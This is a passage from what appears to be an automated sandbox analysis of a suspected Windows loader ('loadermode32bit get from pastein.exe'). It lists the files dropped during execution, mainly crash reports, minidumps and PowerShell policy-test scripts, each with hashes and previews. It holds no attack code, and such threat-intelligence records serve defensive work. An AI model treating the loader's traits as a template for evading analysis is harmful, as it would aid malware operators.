Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.5.7.8.1.6.5.0.5.9.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.5.7.8.2.4.3.1.8.4.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.c.6.c.6.5.a.-.1.9.7.2.-.4.6.9.7.-.8.d.1.f.-.6.f.1.9.c.c.1.2.9.6.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.3.d.7.2.9.a.-.d.5.5.4.-.4.0.5.1.-.8.c.7.1.-.b.b.5.a.0.a.5.f.5.a.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.4.-.f.8.3.f.-.f.9.8.8.d.a.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_611a86e7-ff0c-4592-bab1-4a6d543a8865\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1828567181175942
Encrypted:	false
SSDEEP:	192:Nqb1bMrkGDVOf0BU/KaKHFA/fkzuiFJZ24IO8G:N6bMdDVlBU/KaIq3kzuiFJY4IO8G
MD5:	635886D3985579D4C0931397029198CF
SHA1:	34EF82623042B92C39E8071F7BCB044B4B693E67
SHA-256:	8DFA0F233D4B629081AF3B5619215F33201DEF06B6841EC6AF44F8951F5E76E1
SHA-512:	7FCB0C2E67E3FAF1962864B60B797C7928D3ED7440B84DB57B05E1BD88B0D036315ACAA86C712D02F61AC2F07816BB5CAD763308AF43DDC10A4F8376BC29D45B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.5.7.4.9.5.6.7.0.6.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.5.7.5.0.8.7.9.5.5.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.1.a.8.6.e.7.-.f.f.0.c.-.4.5.9.2.-.b.a.b.1.-.4.a.6.d.5.4.3.a.8.8.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.7.e.4.b.c.6.-.e.7.0.2.-.4.d.c.d.-.8.9.2.8.-.9.8.d.1.5.2.4.f.f.f.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.0.8.-.0.0.0.1.-.0.0.1.4.-.d.d.0.9.-.2.2.8.4.d.a.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_6d3421bc-50a5-472e-9b38-757c47bbf5e0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1892194093472714
Encrypted:	false
SSDEEP:	192:S9ZKkGDSOf0BU/KaGnyENNtzuiFJZ24IO8G:M6DSlBU/KatENtzuiFJY4IO8G
MD5:	10E594DD524B3A10938108A1CFAF873F
SHA1:	263EC53799A529D7FC0CDCEF41B6DECD10F40F7E
SHA-256:	7037A57D1BDC0BC4CEE7E829A3FCEFCA546FFB717493D6EE038EB14E0D313B51
SHA-512:	5E871501061F8BF7ED99EDB9105FD06A6554EA0DEC650234538481D953CAD9490554D89C222F4FE549693E8BCA3F783CDDCD1FF02C7401D633E54A78B33909A4
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.5.1.5.7.4.2.2.4.4.7.3.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.5.1.5.7.4.3.0.7.2.8.6.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.3.4.2.1.b.c.-.5.0.a.5.-.4.7.2.e.-.9.b.3.8.-.7.5.7.c.4.7.b.b.f.5.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.6.c.b.e.7.7.-.f.8.d.8.-.4.3.4.8.-.a.b.1.b.-.d.8.0.c.f.e.1.9.8.3.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.K.2.5.Q.y.J.4.h.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.l.o.a.d.e.r.m.o.d.e.3.2.b.i.t. .g.e.t. .f.r.o.m. .p.a.s.t.e.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.8.-.0.0.0.1.-.0.0.1.4.-.8.d.f.c.-.6.0.7.e.d.a.2.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.e.8.b.7.2.3.9.a.1.8.f.7.c.b.f.1.e.f.d.c.f.f.9.e.3.5.4.5.0.a.e.0.0.0.0.0.0.0.0.!.0.0.0.0.6.e.1.3.0.4.c.6.5.3.9.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EBB.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 8 13:29:02 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	359017
Entropy (8bit):	3.433405601417708
Encrypted:	false
SSDEEP:	3072:95E53W+QypPcz0+V4uEqxBbLTgZjU4H2OkIGl:zE53W+QypkYk4oBfTgZjb1kd
MD5:	D7CB63079133232F62FEB2FC49D95ECF
SHA1:	3BAEA3517D555AF6E02F01D08D05CF50C330774F
SHA-256:	069C87BB271ECB536A25AA43112DB6CEE274E498CF825AFFE805ACC67BCCE105
SHA-512:	2EE288023782C0C6C80D6D9FBC04496B52BFE9D255A7F72F550D2BCB4EF41EDA9E894AD82FDCE7B88B75F92060CF94FAE8C2E5CF2A47E091A647FCDE920A891F
Malicious:	false
Preview:	MDMP..a..... .........se............$...........d...8.......<....)...........u..........`.......8...........T............_...............)...........+..............................................................................eJ......\,......GenuineIntel............T.............se.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70DF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8412
Entropy (8bit):	3.6986011807169326
Encrypted:	false
SSDEEP:	192:R6l7wVeJDJ6Um6YSWSU1yrgmfZUMprBx89bZcsfwTm:R6lXJt616YjSUMrgmfWpZvfp
MD5:	20EBCEF23A7178EFCC07E8A4476C49D3
SHA1:	78B2EAB064196AA9C0581A2D4B495A6AEC4789B3
SHA-256:	C8B6AD38A087926A0505A9C8B725AE21C66E7B09E827533DAFD9F5B225AF2F2E
SHA-512:	4F62717DDD3B9DE6CB9BE94D5E20B0904901E01DD0D31F543BE24827D6A20B17D57F9CA5735C168884C8920AAACEA6909F59CE51794950C250F0F16D430C68D3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER710F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4774
Entropy (8bit):	4.4763043864786125
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5tJg77aI9C1WpW8VY6Ym8M4JzrFr7+q8v7E3nDv3LTd:uIjf5I7oE7VKJl7KQ3j3LTd
MD5:	E83B48C865E0DF4701EEFAB3C72C8B48
SHA1:	9926FA5BBF5F08F6E7F2663DCBFB71B47341899C
SHA-256:	E31D7BC013716AEF79B3AD55756F9B6D61E77F57B842A50E0E9F2BB16DFE7F87
SHA-512:	740808291E1F2450D90851011A6431BF77B2BF668989E7FB6D3DFCC70C19C737D2AF1533ED15ACF9A1F827DBF96BFE7D3133C448326ABE35C024EA4C0D789B51
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95311" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B6B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 8 13:29:09 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	353669
Entropy (8bit):	3.485622373366496
Encrypted:	false
SSDEEP:	3072:UgtD8GIyZc4uEqYuLTgZWaK3XdV8I73mlztlm:UgZ8GIyZc4VcTgZO3NV9ylz/
MD5:	34C0698155843EED88E05894386D6BB7
SHA1:	62E6E6CD5F498A7F5D721311C152A05C325781F6
SHA-256:	EB4EC4B899D8CFDF0696058DFBADB9161303BC9FDF7A6D3625A451ED8B73F0B4
SHA-512:	748FC522E81AE684951577F2833105D252C5E04F6E8EC0C9277DD56800EEA57E20360684B7AD303C2A7A53681496E2E615223DD56BBC5864C3FDD45C0DB80F40
Malicious:	false
Preview:	MDMP..a..... .......%.se............$...............8.......<...0).......-.. u..........`.......8...........T............_..u...........l)..........X+..............................................................................eJ.......+......GenuineIntel............T...........!.se............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D60.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8412
Entropy (8bit):	3.6996027375585427
Encrypted:	false
SSDEEP:	192:R6l7wVeJFN6/1e6YSGSUFHgmfZUMprG89babsfi1J+m:R6lXJP6c6YjSUFHgmfW+agfYZ
MD5:	FE597F8C42A2F7B62435F8A03B3E7635
SHA1:	F70F9A2B306103BE501F17929348270FF8FDD275
SHA-256:	ABD61D8C27C36CF1764436B48B32DAD9B6924BBB87A80D472272529D30E5B2C7
SHA-512:	CDA26D68A453855C51D734F835F08D93E667B61E13CE7DC84D1CF1258C52E5C83D8288989CA91C7722949BE9D9B7B8DE13D1B0AD0083D8623929491404B177A4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 8 13:29:42 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	356229
Entropy (8bit):	3.4687890903187815
Encrypted:	false
SSDEEP:	3072:/kAMCoy3cd4uEqPWLuLTgSRW0fPbag8QcGDB:/kzCoy3cd42WLcTgSouPWX2B
MD5:	A01C21DD34BBB22E21167936E29B3DD9
SHA1:	2082AA2E2B8B83436E8927CA449077626545B978
SHA-256:	94B4754A551CD94DF50BBD278956A599F006484E881F69AEB152F5D79B234720
SHA-512:	3DEB28424F8A71692AA3914959CB084CC44939D076E38150334951227C819C0168F5ECEEE37C63B8B48AB1A88D0D5BEB44EBD6E043B87637D4730D3780A0EEFF
Malicious:	false
Preview:	MDMP..a..... .......F.se............$...............8.......<...0).......-.. u..........`.......8...........T............]..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.......@...).se............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DFD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4774
Entropy (8bit):	4.4760371791437255
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5tJg77aI9C1WpW8VYxjYm8M4JzrFQrj+q8v7lDv38Td:uIjf5I7oE7VFJmKxj38Td
MD5:	B79865046A6144E53DD87E00B35D0FB5
SHA1:	2574201EDCF00A5A030D6DD5CDFEF4E6DF45A6DE
SHA-256:	FFDE56D93C30A3A6586462536CDAF883A64C6C587AC1D20CAC31E0DC7AA6C218
SHA-512:	A6A0CE4346C93AC537B88E74D1A19EBCC3B1CFA193EA083D0FE5043153EC7C44FC67EBF880444FFDD1E316285253F66AA0ACD648B8E0E625C1E1B1956152BDCB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95311" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8418
Entropy (8bit):	3.700393531831143
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2c6M6YSuSUrSagmfZUMprt89bdXsfi/m:R6lXJ16M6YbSUrHgmfW7dcfj
MD5:	0774DC5B5AB482AD90C402B7A174C7F5
SHA1:	8383ECF5200D94663AA4C9435E5FD71D3EB91566
SHA-256:	AEE7B4231BE78DFA7D5AA088275750EE68CDD4A79B6D06F37CA8BD3A1D00F703
SHA-512:	592C21E744424BBAD97FAA7CA87BAB7D7ACC5B28E032142A9DF1F6026E5E19785BD477BD3CA5F3F93E018DFBF7E5B253D5402CA89EB16615F4717291230A1272
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4774
Entropy (8bit):	4.476436304160124
Encrypted:	false
SSDEEP:	48:cvIwWl8zsCJg77aI9C1WpW8VYhYm8M4JzrFGH+q8v7hDv3TTd:uIjfQI7oE7V9JEHK1j3TTd
MD5:	CBA80E2F140BF18F9C114C84B5F17E0D
SHA1:	ED830A70E0040E61B7A4B031B150BDDB9EE7EE10
SHA-256:	97B07BCC0B2A9E64DACA9E2E3B3872C3218915475D9408D2D4FA11AFA03F5473
SHA-512:	F91B98E8F1FC3486284FCF2D500A7614119761C5563CFF311A5CBF7D595F73C864975CD8C97445A91DE3402F205D86CD8BB8B0D485108778C4452F7739C792A1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="95312" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2220
Entropy (8bit):	5.378332489985036
Encrypted:	false
SSDEEP:	48:NWSU4y4RQmFoUeWmfgZ9tK8NPryHm7u1iMugeC/ZPUyu+d:NLHyIFKL3IZ2KjyGOug8K
MD5:	305B8EE4FF78093619B51D3A697D6D7C
SHA1:	E2CADDE3C147E214C41C7FA87D413588D17832B2
SHA-256:	186339ADCE37819CA4FF997714937DB42278461657EB6D121D836445A1243D12
SHA-512:	6393BE3A521AE299097AB7C137C2A7C314D91EE609ACBD02E917ACEEB178797279FD236DFC8A83553738022FE1DAA33B3073554F5EC05769816AA33DE6506FAB
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....i.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fmcdpyx.fks.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34fsg2o5.pkh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ztftkii.ok4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5plm4ggv.23q.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
